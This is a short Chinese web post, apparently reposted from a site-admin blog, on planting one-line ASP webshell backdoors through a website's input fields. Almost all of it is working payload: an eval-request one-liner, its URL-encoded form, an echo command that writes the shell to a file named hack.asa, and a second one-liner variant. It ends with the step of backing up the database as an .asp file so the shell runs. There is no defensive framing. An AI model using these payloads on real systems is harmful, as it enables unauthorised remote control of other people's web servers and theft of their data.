来源：安天团队

收集：X.DW

一般来说就是针对有输入接口的地方插入一句话后门
如下面所示：
（1）<%eval request("#")%>
（2）转换后的代码%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%23%22%29%25%3E   63字节
（3）通过echo命令 echo ^<^%eval request(chr(35))%^> >d:\hack.asa
<%eval(request("a")):response.end%>
然后备份数据库为x.asp等方式。

文章如转载，请注明转载自：http://www.5iadmin.com/post/101.html